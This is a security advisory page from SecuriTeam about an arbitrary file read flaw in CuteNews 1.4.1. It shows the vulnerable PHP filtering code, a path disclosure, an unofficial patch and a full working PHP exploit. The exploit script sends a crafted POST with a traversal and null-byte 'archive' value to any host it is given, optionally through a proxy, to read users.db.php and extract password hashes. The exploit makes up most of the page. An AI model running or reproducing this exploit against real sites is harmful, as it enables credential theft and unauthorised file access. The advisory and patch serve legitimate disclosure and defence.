SecuriTeam - CuteNews Arbitrary File Access (Exploit)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

CuteNews is "a powerful and easy for using news management system that use flat files to store its database". A vulnerability within CuteNews allows remote attackers to cause the program to return the content of arbitrary files, for example users.db.php and config.php, both containing sensitive information.

Credit:
The information has been provided by h e.
The original article can be found at: http://www.hamid.ir/security/cutenews.txt

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* CuteNews version 1.4.1

Input passed to the "archive" (POST,COOKIE,... method) parameter in "inc/function.php" isn't properly verified. This can be exploited to access arbitrary files (like users.db.php and config.php).

Vulnerable Code:
The following lines in $cutepath/inc/functions.inc.php on line 7

if( isset($_GET['archive']) and $_GET['archive'] != "" and !eregi("^[_a-zA-Z0-9-]{1,}$", $_GET['archive'])){ die("invalid archive characters"); }

You can see that CuteNews just filters:
$_GET['archive'] but they forgot $_POST['archive'], $COOKIE['archive']! and in the rest of code they user $archive instead of $_GET['archive'] !!!?

For example:
if($archive == ""){
        $news_file = "$cutepath/data/news.txt";
        $comm_file = "$cutepath/data/comments.txt";
}else{
        $news_file =
"$cutepath/data/archives/$archive.news.arch";
        $comm_file =
"$cutepath/data/archives/$archive.comments.arch";
}
...

Successful exploitation requires that "register_globals" is enabled.

Path Disclosure:
In addition, if an attacker provides a filename which not exists, the application will return some information about path of CuteNews on the server, like this:

Warning:
file([PATH]/cutenews/data/archives/hamid.news.arch): failed to open stream: No such file or directory in [PATH]\cutenews\inc\shows.inc.php on line 583

Unofficial Patch:
Change in line 8 : inc/functions.inc.php

if( isset($archive) and $archive != "" and !eregi("^[_a-zA-Z0-9-]{1,}$", $archive)){ die("Patched by Hamid Ebadi -->http://hamid.ir ( Hamid Network Security Team) "); }
if( isset($_REQUEST['archive']) and $_REQUEST['archive'] != "" and !eregi("^[_a-zA-Z0-9-]{1,}$", $_REQUEST['archive'])){ die("Patched by Hamid Ebadi -->http://hamid.ir ( Hamid Network Security Team) "); }

Exploit:
<?php
// Happy NEW Iranian year .
// Happy Norouz ( PERSIAN celebration )
// CuteNews 1.4.1 (CutePHP.com) Hash password Finder
// by Hamid Ebadi
// http://hamid.ir
// Bug Discovered and Exploited by Hamid Ebadi .: Hamid Network Security Team :.
// run it from your browser...
// make these changes in php.ini if you have troubles with this script

//allow_call_time_pass_reference = on
//register_globals = On

error_reporting(0);
echo '<head><title>CuteNews 1.4.1 user Hash password Finder</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
      <style type="text/css">
      
      </style></head>
      <body>
<h2>CuteNews 1.4.1 (and Below) user Hash password Finder </h2>
<p class="Stile6">Security ? . </p>
<p class="Stile6">Bug Discovered and Exploited by Hamid Ebadi <a href="http://www.hamid.ir" target="_blank">.: Hamid Network Security Team :.</a></p>
<p class="Stile5">Happy Norouz ( PERSIAN new year celebration ) Greetz to all Iranian Hackers spacially my friends in ihsteam.com c0d3r.org kapda.ir simorgh-ev.com hat-squad.com blacknews.ws ashiyane.com websecurity.ir crouz.com shabgard.org hackerz.ir and ...</p>

<p class="Stile6">read this paper about <a href="http://www.hamid.ir/security/" target="_blank">CuteNews 1.4.1 vulnerability</a></p>
<table width="84%" >
  <tr>
    <td width="43%">
     <form name="form1" method="post" action="'.$PHP_SELF.'?path=value&host=value&". "port=value&command=value&proxy=value">
      <p>
       <input type="text" name="host">
      <span class="Stile5">hostname (ex: www.sitename.com) </span></p>
      <p>
        <input type="text" name="path">
        <span class="Stile5">path (ex: /cutenews/example2.php ) </span></p>
      <p>
      <input type="text" name="port">
        <span class="Stile5">specify a port other than 80 (default value) </span></p>
      <p>
      <input type="text" name="proxy">
        <span class="Stile5">send exploit through an HTTP proxy (ip:port) </span></p>
      <p>
      <input type="text" name="command">
        <span class="Stile5">specify a file other than /../users.db.php%00 to read </span></p>
      <p>
          <input type="submit" name="Submit" value="go!">
      </p>
<p class="Stile5">Spacial THX : rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a> for his great codes (i just change few lines of RGOD old NETQUERY remote commands execution exploit)</p>
    </form></td>
  </tr>
</table>
</body>
</html>';

function show($headeri)
{
$host=$_POST[host];
$path=$_POST[path];
$port=$_POST[port];
$proxy=$_POST[proxy];
$command=$_POST[command];
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td> </td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
       }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td> </td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
       }

echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

if ( ($host<>''))
{
if ($port=='') {$port=80;}
if ($path=='') {$path="example2.php";}

if ($command=='') {$command="/..//users.db.php%00";}
$data="archive=".$command;
if ($proxy=='')
       {$packet="POST ".$path." HTTP/1.1\r\n";}
else
       {
        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);
        if ($c==0) {
                    echo 'check the proxy...<br>';
             die;
            }
         else
        {$packet="POST http://".$host.$path." HTTP/1.1\r\n";}
        }

$packet.="Accept: */*\r\n";
$packet.="Referer: http://".$host.$path."\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Hamid/2006\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;

echo '<br> Sending exploit to '.$host.'<br>';

if ($proxy=='')
           {$fp=fsockopen(gethostbyname($host),$port);}
           else
           {$parts=explode(':',$proxy);
     echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
     $fp=fsockopen($parts[0],$parts[1]);
     if (!$fp) { echo 'No response from proxy...';
   die;
         }

     }
echo $packet ;
show($packet);
fputs($fp,$packet);

if ($proxy=='')
{ $data='';
     while (!feof($fp))
     {
      $data.=fgets($fp);
     }
}
else
{
$data='';
   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))
   {
      $data.=fread($fp,1);
   }

}
fclose($fp);
if (eregi('HTTP/1.1 200 OK',$data))
    {echo 'Exploit sent...<br> If CuteNews 1.4.1 is unpatched and vulnerable <br>';
     echo 'you will see '.htmlentities($command).' output inside HTML...<br><br>';
    }
else
    {echo 'Error, see output...';}

//show($data); //debug: show output in a packet dump...
//echo nl2br(htmlentities($data));
echo $data;
}
?>

blog comments powered by Disqus

	ProFTPD Response Pool Use-After-Free Code Execution Vulnerability
	Insight Control for Linux Multiple Vulnerabilities
	HP-UX Running NFS/ONCplus Denial of Service Vulnerability
	HP-UX Running BIND Denial of Service Vulnerability 2011
	HP-UX Running XNTP Denial of Service Vulnerability
	HP-UX Denial of Service Vulnerability
	Webkit Detached Body Element Code Execution Vulnerability
	Mac OS X Compact Font Format Decoder Code Execution Vulnerability
	WebKit WBR Tag Removal Code Execution Vulnerability
	Webkit Undefined DOM Prototype Attach Code Execution Vulnerability
	Apple HFS Information Disclosure Vulnerability
	XPDF arbitrary Arbitrary Code Execution Vulnerabilities
	Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability
	Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability
	HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities